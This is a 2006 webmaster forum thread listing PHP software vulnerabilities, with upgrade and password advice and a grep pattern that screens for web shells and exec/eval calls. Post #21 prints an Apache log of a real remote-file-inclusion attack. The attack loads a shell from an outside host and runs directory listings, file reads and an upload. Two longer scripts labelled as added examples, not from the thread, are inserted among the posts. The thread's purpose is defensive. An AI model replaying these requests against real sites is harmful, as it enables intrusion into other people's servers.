Greenguy's Board


2006-05-16, 12:37 PM   #1
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Security Advisories for multiple products

Recently, we've seen a huge number of exploits running through commonly installed software -- software that usually has already released a fix. However, you may not have even known that there was an upgrade.

If you are running any of the following software, take a few minutes to check and see that you are running the latest version.

Vbulletin, 3.5.4 (or, have applied the diffs to upgrade the two .php files that are exploitable)

PHPBB, 2.0.20 -- mostly bug fixes in the recent version. 2.0.19 released in December fixed an authentication leak. 2.0.18 was released in October 2005 which fixed a hole allowing remote scripts to be installed.

Invision Power Board - 2.15 - SQL Injection, Remote script execution, ability to upload images with malicious html/javascript code.

Autolinks -- ages ago, this had an issue with al_initialize.php being able to be used to launch attacks. This has been fixed, but, should be upgraded to the latest version.

phpmyadmin -- 2.8.0.4 is the most recent version and fixes a few issues allowing remote code execution.

phpadsnew -- 2.0.8, earlier versions allow remote code execution through adxmlrpc.php. Upgrading is rather straightforward. Make a backup of config.inc.php, upload the files, chmod 777 config.inc.php, log in, it'll run the upgrade automatically, chmod 644 config.inc.php. Even 2.0.7 released in March is able to be compromised.

wordpress -- if you are not running 2.0.3, there is a remote code exploit. The wordpress upgrade is pretty simple and straightforward.

awstats -- 6.6, 6.5 has an entry point that could allow remote code execution.

sitedepth -- ask them for an updated copy of constants.php. Special thanks to three people for forwarding that info -- if you want attribution, let me know and I'll modify the entry here.

--- Forwarded from 'someone'
I-RATER -- They emailed out a new "common.php" on April 26th. With spam filters and the php file being an attachment, it may not have made it to a lot of people.


The email body __________________________

"We have been made aware of a security vulnerability in ALL versions of
I-RATER PLATINUM allowing a remote user to exploit the common.php
"include_path" Parameter Remote File Inclusion.

Users should replace the attached common.php file immediately.
Many thanks
I-RATER DEV TEAM
________________________________________

phpBazar version 2.10 -- if you are running an older version there are numerous holes that allow remote code execution.

If you are using mailform software, verify that you are running the newest version. In recent months, scripts have been scanning machines for vulnerable mailform scripts. If you're seeing a lot of email from submission forms, you might want to take a look as you might be relaying spam unknowingly.

If your webhost runs apache without running setuid, have them run the following check on your web directories:

find . -name \*.php -user www-data -print > /tmp/webownedphp

replace www-data with the username that the webserver runs as. If you admin your own machine, try:

ps aux | grep http
or
ps aux | grep apache

In the first column, there should be a listing of usernames, perhaps nobody, or www or www-data.

Once you have done that, more /tmp/webownedphp, then, take a look to make sure those scripts look valid. If you see an ASCII picture of a spider or a lot of Cyrillic characters that you don't recognize, it's probably a remote shell program. With that, they can get in and run remote scripts as the web user. Those scripts can attach to IRC servers and launch denial of service attacks, they can launch spam engines, or, all sorts of other nasty things.

Another attack that we have recently seen is the inclusion of javascript on web pages. Some of these are scripts that are loaded that run remotely and try to change every file they can, while others actually log in with FTP, grab a file, modify it, put the file back in place and log out. There's no hunting around for the right file, no authentication errors, nothing that suggests that they don't have the exact username/password that you use.

What this says is either the person has used spyware or a keylogger to get the user/password, or, each of the people this has happened to has used the same user/password combination somewhere -- and the people were able to determine the connection of the user/password with the domain involved.

Tommy keeps an address book with each sponsor's site name and the unique user/pass for each of those sites tucked away. A different username/password combination is used for email, ftp, each server, each sponsor account, each online login that you have. Cleo uses a program on her mac that stores it away electronically behind a password.

Either way you do it, you need to make sure that you use different username/password combinations everywhere so that a single compromised password doesn't ruin everything you've worked towards. And passwords need to be strong. Easy to guess dictionary words are terrible. Letters, numbers, and punctuation (some sponsor programs don't allow this) all make it more difficult to guess. If you have trouble remembering passwords, refer to that black book. However, as one client of mine found out, after a nasty divorce, his house was broken into when he was out of town and his black book was stolen. Nothing else in the house was touched. Guard that book well as it is just as valuable as storing the passwords online.

Remember, if your site is hacked, that could directly affect your revenue and in some cases, jeopardize your site staying up. Many hosting companies will shut down a server that generates complaints -- making it impossible for you to fix remotely.
2006-05-16, 12:53 PM   #2
emmanuelle
0100011101100101011001010 1101011001000000100001101 1010000110100101100011
Join Date: Mar 2004
Location: Montreal
Posts: 1,441
Very helpful info- thanks for doing the heavy lifting!
2006-05-16, 12:56 PM   #3
MrYum
Arghhhh...submit yer sites ya ruddy swabs!
Join Date: May 2004
Location: Sunny Florida!
Posts: 5,108
Excellent info and advice...thanks Sparky
2006-05-16, 01:07 PM   #4
Jim
Banned
Join Date: Aug 2003
Location: Mohawk, New York
Posts: 19,477
Finally
Thanks for the info, my friend
2006-05-16, 01:15 PM   #5
BillyWRN
Aw, Dad, you've done a lot of great things, but you're a very old man, and old people are useless
Join Date: Jul 2004
Posts: 20
Very helpful, Thanks a bunch for posting it.
2006-05-16, 01:22 PM   #6
f69j69b
With $10,000, we'd be millionaires! We could buy all kinds of useful things like ... love!
Join Date: Jan 2004
Location: colorado
Posts: 318
We are very fortunate to have you as a member of this board. Thanks, cd34.

Fred
__________________
https://furry-yiff.com/
2006-05-16, 04:09 PM   #7
SirMoby
Jim? I heard he's a dirty pornographer.
Join Date: Aug 2003
Location: Washington, DC
Posts: 2,706
You rock. I think I'm getting lazy, so it's nice to read your posts.
2006-05-17, 07:09 PM   #8
digital2
A woman is like beer. They look good, they smell good, and you'd step over your own mother just to get one!
Join Date: Aug 2004
Location: Spain
Posts: 51
Thanks Very Much..Data Very Profitable...
2006-05-18, 07:55 AM   #9
terry
You can now put whatever you want in this space :)
Join Date: Apr 2004
Location: Montreal
Posts: 5,883
Thanks for the info. I recently had major issues with autogallery sql and hackers... just wanted to add that one to your list. You can find info about it on their site, jmbsoft.com.
2006-05-19, 03:15 PM   #10
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Added phpBazar to the list -- if you're running classifieds using it, there are a ton of holes in the older versions.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2006-05-24, 03:00 PM   #11
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
# List the .php files owned by the webserver user, then screen each one for known shell names or passthru/exec/system/eval calls
find -L /var/www -name \*.php -user www-data -print > /var/tmp/webownedphp
while IFS= read -r f; do grep -ilE '((r57|c99)shell)|(passthru|exec|system|eval)\(' "$f"; done < /var/tmp/webownedphp > /var/tmp/exploits

Somewhat helpful in finding most of the exploits -- or at least weeding the list down quite a bit.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
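As an added example (not the thread's own commands), here is a script that does what posts #1 and #11 describe end to end: find the .php files the webserver user owns, then screen each one for known shell names, calls to dangerous functions and the non-ASCII banners post #1 mentions, so the list left to read by hand is shorter. It assumes a POSIX sh with GNU find, grep and tr; the directory and webserver user name are supplied by the caller, and the 200-byte threshold is an arbitrary starting point.

```shell
#!/bin/sh
# Added example, not the thread's own commands. Screens .php files that the
# webserver user was able to write, the way posts #1 and #11 do by hand.
# Assumes POSIX sh with GNU find/grep/tr; DIR and USER are supplied by the caller.

# Things worth a manual look: known shell names, dangerous functions called
# directly, and the decode-then-eval pattern that packed shells use. This is
# a screen for review, not proof of compromise: legitimate code uses some of these.
SUSPECT_RE='(r57|c99)shell|(passthru|shell_exec|exec|system|popen|eval|assert)[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\('

# non_ascii_count FILE: number of bytes outside 0x00-0x7F. Post #1 mentions
# ASCII art and Cyrillic banners; real PHP code in a web root is mostly plain ASCII.
non_ascii_count() {
    LC_ALL=C tr -d '\000-\177' < "$1" | wc -c | tr -d ' '
}

# scan_php_file FILE: print "FILE: reason" and return 0 when suspicious,
# 1 when nothing matched. The 200-byte threshold is an assumption; tune it.
scan_php_file() {
    f=$1
    hit=1
    if grep -qiE "$SUSPECT_RE" "$f"; then
        printf '%s: known shell name or dangerous call\n' "$f"
        hit=0
    fi
    n=$(non_ascii_count "$f")
    if [ "$n" -gt 200 ]; then
        printf '%s: %s non-ASCII bytes\n' "$f" "$n"
        hit=0
    fi
    return $hit
}

# audit_web_php DIR [USER]: the find from post #11, piped through the scan.
# With USER given (www-data, nobody, www: check with ps aux | grep apache),
# only files owned by that user are considered, i.e. files a compromised
# web process could have dropped or rewritten.
audit_web_php() {
    dir=$1
    user=${2:-}
    if [ -n "$user" ]; then
        find -L "$dir" -name '*.php' -user "$user" -print
    else
        find -L "$dir" -name '*.php' -print
    fi | while IFS= read -r f; do
        scan_php_file "$f" || :
    done
}
```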
2006-05-24, 03:18 PM   #12
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Add to the list a potential exploit through bblog -- although, that software doesn't have indexes on most of the queries and will be a performance problem if you get more than casual traffic on it.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2006-05-25, 10:10 PM   #13
nottslad
Lord help me, I'm just not that bright
Join Date: Dec 2004
Location: Mexico
Posts: 107
Thanks for that! I'd have missed it without your post.

I have a site running I-Rater, set it up about 2 years ago with my old UK ISP email which I no longer have access to. I've submitted a support request to get the needed files and change my contact details.

Plus, it also gave me a new idea to use on one of my mainstream domains.
2006-05-26, 11:46 AM   #14
emmanuelle
0100011101100101011001010 1101011001000000100001101 1010000110100101100011
Join Date: Mar 2004
Location: Montreal
Posts: 1,441
Irater sent out a mailer a few weeks ago about the problem, and with a fix. If you don't have it, I can forward it to you
2006-06-01, 06:49 PM   #15
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Wordpress released 2.0.3 today which fixes a security issue.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2006-06-01, 07:01 PM   #16
ClickBuster
I'm normally not a praying man, but if you're up there, please save me Superman!
Join Date: Dec 2004
Location: Bulgaria
Posts: 476
I'm updating right now. Thanks for the heads up.
__________________
The tendency is to push it as far as you can
-- Fear and Loathing In Las Vegas
2006-06-01, 07:06 PM   #17
Bill
Selling porn allows me to stay in a constant state of Bliss - ain't that a trip!
Join Date: Apr 2003
Posts: 3,914
I was wondering about that - I hadn't seen any sign that the 2.0.2 version was adapted to this new security threat.

What about phpmyadmin and phpadsnew - are the latest versions of those secure? Wasn't the scuttlebutt that they were both risks with these new attacks?
2006-06-01, 07:08 PM   #18
MrMaryLou
i fucking told i type to fucking fast wtf
Join Date: Mar 2003
Location: New York
Posts: 11,247
I updated Wordpress today; it was a snap. Thanks to Sparky.
__________________
Join Me For On The Bench: http://www.greenguysboard.com/onthebench/
2006-06-01, 07:47 PM   #19
Useless
Certified Nice Person
Join Date: Oct 2003
Location: Dirty Undies, NY
Posts: 11,268
Quote:
Originally Posted by cd34
Wordpress released 2.0.3 today which fixes a security issue.
Anyone know if there's documentation on which files were altered for this update? I've done some ugly changes and don't want to risk overwriting files if I don't have to.
__________________
Click here to purchase a bridge I'm selling.
2006-06-02, 03:09 AM   #20
Ms Naughty
old enough to be Grandma Scrotum
Join Date: Aug 2003
Location: Australia
Posts: 1,408
I'm congratulating myself on upgrading without any major stuff-ups.

In terms of what's new, I don't know of a list, but you can spot what's new if you sort by date in your FTP program.

I just backed up the whole lot and uploaded the new stuff over the old. Except for my theme.
__________________
Promote Bright Desire
2006-08-06, 12:49 PM   #21
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Wordpress: http://wordpress.org/development/2006/07/wordpress-204/

If you run sitedepth, you might want to make sure you clean up the old backups after the upgrades are done. Here's a log showing how XSS works using a current, updated version of sitedepth. The new version was fixed with a patch from SiteDepth due to this thread, however, they methodically store their 'old versions' after upgrade in a pretty predictable manner. No problem for the script kiddie to stumble across the files he needed. After this person exploited the site, they loaded a shell on one of the sitedepth main scripts located in a directory which was world writeable -- way to go guys.

Code:
84.169.229.61 - - [02/Aug/2006:17:17:28 -0400] "GET /sd3/ HTTP/1.1" 404 202 "http://www.xxx-xxxxxx.com/sd3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.169.229.61 - - [02/Aug/2006:17:58:53 -0400] "GET /sitedepth3/ HTTP/1.1" 200 1101 "http://www.xxx-xxxxxx.com/sitedepth3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

[guy surfs front page of site to confirm site is running sitedepth. clipped]

84.169.229.61 - - [02/Aug/2006:18:01:04 -0400] "GET /constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:13 -0400] "GET /sitedepth3/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:19 -0400] "GET /sitedepth3/backup/ HTTP/1.1" 403 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:26 -0400] "GET /sitedepth3/backup/previous_versions/ HTTP/1.1" 403 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:35 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 5469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 18624 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:46 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 22411 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:55 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 8457 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:06 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 142138 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:16 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//_old_sitedepth HTTP/1.1" 200 76195 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:26 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:33 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//previews HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill HTTP/1.1" 200 18781 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:50 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=file&file=/var/www/xxuserxx/xxx-xxxxxx.com/ccbill/*index.htm HTTP/1.1" 200 16180 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:08 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:11 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections HTTP/1.1" 200 5670 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:22 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 5132 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2006-08-07, 11:20 AM   #22
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
phpmyadmin, subject to XSS vulnerability, again, redux. If you're not running version 2.8.2.1, update quickly.

http://www.phpmyadmin.net/home_page/...php?relnotes=0

If you use PHPMyAdmin, I would suggest you put it behind .htaccess/.htpasswd authentication, or protect it from being accessed from other locations around the net -- while you're still not protected, you are at least making it much more difficult for the systematic scans to discover your whereabouts.

Addendum to the sitedepth note: You may delete files in the previous_versions directory after the upgrade has been performed.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
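Added example (not from the thread) of the .htaccess the post recommends for a phpMyAdmin directory, written by a small sh function that requires both a login and an allowed client address, and that refuses an htpasswd file placed inside the web directory, where the server could hand it out. It assumes Apache 2.4 syntax, AllowOverride AuthConfig enabled for that directory, and a password file already created with htpasswd; the addresses in the test are documentation ranges.

```shell
#!/bin/sh
# Added example, not from the thread. Writes DIR/.htaccess so that a
# phpMyAdmin directory needs both a valid login and a client address from an
# allow list; with only one of the two, the scans the post mentions still
# find and probe it. Assumes Apache 2.4 (RequireAll/Require ip), that
# httpd.conf has "AllowOverride AuthConfig" for DIR, and that HTPASSWD was
# created beforehand, e.g.: htpasswd -c /etc/apache2/pma.htpasswd admin

# protect_dir DIR HTPASSWD NETS
#   NETS is a space-separated list of addresses or CIDR ranges allowed in.
#   Returns 1 without writing anything when HTPASSWD would sit under DIR
#   (the web server could serve the hash file) or when NETS is empty
#   (that would lock everyone out).
protect_dir() {
    dir=$1; pw=$2; nets=$3
    case "$pw" in
        "$dir"/*)
            echo "protect_dir: keep $pw outside the web directory $dir" >&2
            return 1 ;;
    esac
    if [ -z "$nets" ]; then
        echo "protect_dir: no allowed networks given" >&2
        return 1
    fi
    cat > "$dir/.htaccess" <<EOF
# Generated by protect_dir: both conditions must hold for every request.
AuthType Basic
AuthName "phpMyAdmin"
AuthUserFile $pw
<RequireAll>
    Require valid-user
    Require ip $nets
</RequireAll>
EOF
}

# protected_by DIR: print the allow list from an existing .htaccess, or
# nothing (status 1) if the directory is not protected this way.
protected_by() {
    sed -n 's/^ *Require ip //p' "$1/.htaccess" 2>/dev/null | grep .
}
```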